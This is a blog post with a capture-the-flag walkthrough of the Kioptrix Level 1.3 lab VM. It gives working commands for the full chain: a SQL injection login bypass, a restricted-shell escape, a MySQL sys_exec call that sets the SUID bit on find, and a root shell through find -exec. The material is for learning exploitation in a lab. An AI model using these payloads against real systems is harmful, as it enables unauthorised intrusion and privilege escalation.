Hack The Kioptrix Level-1.3 (Boot2Root Challenge)

at 8:23 AM Saturday, July 14, 2018

This Kioptrix 4th VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.
You can Download it from here and run install in your VM.
Penetrating Methodologies
§  Network sccaning (netdiscover, Nmap)
§  Directory brute-force (dirb)
§  Login Form SQli
§  Spwaning tty shell
§  SUID Privilege escaltion
§  Get root access and capture the flag
Lets start!!
Turn on your attacking machine and use netdiscover command to scan your local network to get target IP.




So we target at 192.168.1.106 let go for its enumeration and scan open ports and protocols. With help nmap aggressive scan we have observe several open port and service running on it.




Since port 80 is open so without wasting time we use dirb for directory brute-force attack and enumerated /john as a directory which could give something valuable to us.
drib http://192.168.1.106




Consequently we explored URL http://192.168.1.106/john in the web browser and notice john.php file. Awkwardly I didn’t found any treasured from inside this file.




Further, I came back to its home page and it was login page as shown below. Here we can try sql injection for login.




So I simply enter following and get login successfully.
Username: john
Password: ' or 1=1 #




And welcomed by following web page which serves actual credential for the user “john”




Since we port 22 is open for ssh and we have enumerated following credential so let’s try to login to access tty shell of victim’s machine and then execute below commands.
Username: john
Password:  MyNameIsJohn
echo os.system('/bin/bash')
cd /var/www




Then view its file and directory list where you will get checklogin.php file; open it for further step.
ls
cat checklogin.php
By read it we conclude that mysql user name is root with No password.




Now let try to login into mysql server with the help of following command and try to execute some malicious query through it.
mysql -u root -p
SELECT sys_exec('chmod u+s /usr/bin/find');
echo os.system('/bin/bash')
quit

By the mean of mysql we are trying to enable SUID bit for find command.




Now move to /tmp directory and execute following command for root access.
cd /tmp
touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;
ls
cat congrats .txt

Yuppieee!!! We finished this task and complete the challenge……………………………


Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)